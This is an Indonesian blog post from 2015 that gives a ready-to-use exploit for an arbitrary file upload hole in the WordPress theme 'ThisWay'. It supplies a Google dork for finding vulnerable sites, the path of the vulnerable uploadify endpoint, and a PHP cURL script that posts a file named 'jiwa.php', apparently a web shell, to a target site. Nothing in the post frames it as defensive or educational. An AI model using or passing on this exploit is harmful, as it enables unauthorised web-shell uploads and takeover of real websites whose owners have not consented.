Follow Instagram Kami [=>] www.instagram.com/rinaldi1001101 [=]

Minggu, 28 Juni 2015

ThisWay file upload

*pakai XAMPP

Dork : inurl:"/wp-content/themes/ThisWay/"
Exploit : /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

Script PHP :

$uploadfile="jiwa.php";
$ch = curl_init("SlemanGetar.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Sumber: Slemanroot.net

**mau vakum bentaran

Tidak ada komentar:

Posting Komentar